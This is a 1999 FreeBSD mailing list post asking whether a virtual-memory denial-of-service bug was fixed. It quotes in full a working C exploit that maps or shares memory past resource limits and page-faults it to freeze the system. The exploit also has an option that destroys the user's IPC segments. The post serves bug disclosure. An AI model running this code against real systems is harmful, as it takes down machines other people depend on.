From owner-freebsd-stable  Mon Oct  4 12:23:11 1999
Delivered-To: freebsd-stable@freebsd.org
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1])
	by hub.freebsd.org (Postfix) with ESMTP id 0E1F61553F
	for <freebsd-stable@FreeBSD.ORG>; Mon,  4 Oct 1999 12:22:55 -0700 (PDT)
	(envelope-from mike@sentex.net)
Received: from simoeon (simeon.sentex.ca [209.112.4.47]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id PAA11710; Mon, 4 Oct 1999 15:22:54 -0400 (EDT)
Message-Id: <3.0.5.32.19991004152203.00f11370@staff.sentex.ca>
X-Sender: mdtpop@staff.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32)
Date: Mon, 04 Oct 1999 15:22:03 -0400
To: freebsd-stable@FreeBSD.ORG
From: Mike Tancsa <mike@sentex.net>
Subject: Re: [Patches avail?] Re: MMAP() in STABLE/CURRENT ... 
Cc: Matthew Dillon <dillon@apollo.backplane.com>
In-Reply-To: <Pine.BSF.4.10.9910041519140.17532-100000@thelab.hub.org>
References: <Pine.BSF.4.10.9910042004360.487-100000@ady.warpnet.ro>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-stable@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.ORG


Speaking of mmap, was this DoS every fixed/ commited to stable ?

With 
slag3% limit -h
cputime         unlimited
filesize        32768 kbytes
datasize        32768 kbytes
stacksize       65536 kbytes
coredumpsize    unlimited
memoryuse       32768 kbytes
memorylocked    32768 kbytes
maxproc         16 
openfiles       48 


The program below with the argument  9999999999999 effectivly freezes the
box. It seems the more swap you have, the bigger the chunk you need to slog
your machine

FreeBSD 3.3-STABLE #0: Sun Oct  3 09:51:34 EDT 1999


/*
 * This program can be used to exploit DoS bugs in the VM systems or utility
 * sets of certain OS's.
 *
 * Common problems:
 * 1. The system does not check rlimits for mmap and shmget (FreeBSD)
 * 2. The system never bothers to offer the ability to set the rlimits for
 *    virtual memory via shells, login process, or otherwise. (Linux)
 * 3. b. The system does not actually allocate shared memory until a page
fault
 *       is triggered (this could be argued to be a feature - Linux, *BSD)
 *    a. The system does not watch to make sure you don't share more memory 
 *       than exists. (Linux, Irix, BSD?)
 * 4. With System V IPC, shared memory persists even after the process is
 *    gone. So even though the kernel may kill the process after it
exhausts all
 *    memory from page faults, there still is 0 memory left for the system.
 *    (All)
 *
 * This program should compile on any architecture. SGI Irix is not
 * vulnerable. From reading The Design and Implementation of 4.4BSD it sounds
 * as if the BSDs should all be vulnerable. FreeBSD will mmap as much memory
 * as you tell it. I haven't tried page faulting the memory, as the system is
 * not mine. I'd be very interested to hear about OpenBSD...
 *
 * This program is provided for vulnerability evaluation ONLY. DoS's aren't
 * cool, funny, or anything else. Don't use this on a machine that isn't
 * yours!!!
 */
#include <stdio.h>
#include <errno.h>
#include <sys/ipc.h>
#include <sys/shm.h> /* redefinition of LBA.. PAGE_SIZE in both cases.. */
#ifdef __linux__
#include <asm/shmparam.h>
#include <asm/page.h>
#endif
#include <sys/types.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/fcntl.h>
#include <sys/mman.h>

int len;

#define __FUXX0R_MMAP__

/* mmap also implements the copy-on-fault mechanism, but because the only way
 * to easily exploit this is to use anonymous mappings, once the kernel kills
 * the offending process, you can recover. (Although swap death may still
 * occurr */
/* #define __FUXX0R_MMAP__ */

/* Most mallocs use mmap to allocate large regions of memory. */
/* #define __FUXX0R_MMAP_MALLOC__ */


/* Guess what this option does :) */
#define __REALLY_FUXX0R__  

/* From glibc 2.1.1 malloc/malloc.c */
#define DEFAULT_MMAP_THRESHOLD (128 * 1024) 

#ifndef PAGE_SIZE
# define PAGE_SIZE 4096
#endif

#ifndef SHMSEG
# define SHMSEG 256
#endif

#if defined(__FUXX0R_MMAP_MALLOC__)
void *mymalloc(int n)
{
    if(n <= DEFAULT_MMAP_THRESHOLD)
	n = DEFAULT_MMAP_THRESHOLD + 1;
    return malloc(n);
}

void myfree(void *buf)
{
    free(buf);
}
#elif defined(__FUXX0R_MMAP__)
void *mymalloc(int n)
{
    int fd;
    void *ret;
    fd = open("/dev/zero", O_RDWR);
    ret = mmap(0, n, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0);
    close(fd);
    return (ret == (void *)-1 ? NULL : ret);
}
void myfree(void *buf)
{
    munmap(buf, len);
}

#elif defined(__FUXX0R_SYSV__)
void *mymalloc(int n)
{
    char *buf;
    static int i = 0;
    int shmid;
    i++; /* 0 is IPC_PRIVATE */
    if((shmid = shmget(i, n, IPC_CREAT | SHM_R | SHM_W)) == -1)
    {
#if defined(__irix__)
    	if (shmctl (shmid, IPC_RMID, NULL))
	{
	    perror("shmctl");
	}
#endif
	
	return NULL;	
    }
    if((buf = shmat(shmid, 0, 0)) == (char *)-1)
    {
#if defined(__irix__)
    	if (shmctl (shmid, IPC_RMID, NULL))
	{
	    perror("shmctl");
	}
#endif
	return NULL;
    }

#ifndef __REALLY_FUXX0R__
    if (shmctl (shmid, IPC_RMID, NULL))
    {
	perror("shmctl");
    }
#endif

    return buf;
}

void myfree(void *buf)
{
    shmdt(buf);
}
#endif

#ifdef __linux__
void cleanSysV()
{
    struct shmid_ds shmid;
    struct shm_info shm_info;
    int id;
    int maxid;
    int ret;
    int shid;
    maxid = shmctl (0, SHM_INFO, (struct shmid_ds *) &shm_info);
    printf("maxid %d\n", maxid);
    for (id = 0; id <= maxid; id++) 
    {
	if((shid = shmctl (id, SHM_STAT, &shmid)) < 0)
	    continue;

	if (shmctl (shid, IPC_RMID, NULL))
	{
	    perror("shmctl");
	}
	printf("id %d has %d attachments\n", shid, shmid.shm_nattch);
	shmid.shm_nattch = 0;
	shmctl(shid, IPC_SET, &shmid);
	if(shmctl(shid, SHM_STAT, &shmid) < 0)
	{
	    printf("id %d deleted sucessfully\n", shid);
	}
	else if(shmid.shm_nattch == 0)
	{
	    printf("Still able to stat id %d, but has no attachments\n", shid);
	}
	else
	{
	    printf("Error, failed to remove id %d!\n", shid);
	}	

    }
}
#endif

int main(int argc, char **argv)
{
    int shmid;
    int i = 0;
    char *buf[SHMSEG * 2];
    int max;
    int offset;
    if(argc < 2)
    {
	printf("Usage: %s <[0x]size of segments>\n", argv[0]);
#ifdef __linux__
	printf("    or %s --clean (destroys all of IPC space you have permissions
to)\n", argv[0]);
#endif
	exit(0);
    }

#ifdef __linux__
    if(!strcmp(argv[1], "--clean"))
    {
	cleanSysV();
	exit(0);
    }
#endif 
    
    len = strtol(argv[1], NULL, 0);
    for(buf[i] = mymalloc(len); i < SHMSEG * 2 && buf[i] != NULL; buf[++i]
= mymalloc(len))
	;

    max = i;
    perror("Stopped because");
    printf("Maxed out at %d %d byte segments\n", max, len);
#if defined(__FUXX0R_SYSV__) && defined(SHMMNI)
    printf("Despite an alleged max of %d (%d per proc) %d byte segs. (Page "
	    "size: %d), \n", SHMMNI, SHMSEG, SHMMAX,  PAGE_SIZE); 
#endif
    
#ifdef __REALLY_FUXX0R__
    fprintf(stderr, "Page faulting alloced region... Have a nice life!\n");
    for(i = 0; i < max; i++)
    {
	for(offset = 0; offset < len; offset += PAGE_SIZE)
	{
	    buf[i][offset] = '*';
	}
	printf("wrote to %d byes of memory, final offset %d\n", len, offset);
    }
    // never reached :(
#else
    for(i = 0; i <= max; i++)
    {
	myfree(buf[i]);
    }
#endif
    exit(42);
}



	---Mike
------------------------------------------------------------------------
Mike Tancsa,                          	          tel 01.519.651.3400
Network Administrator,     			  mike@sentex.net
Sentex Communications                 		  www.sentex.net
Cambridge, Ontario Canada


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-stable" in the body of the message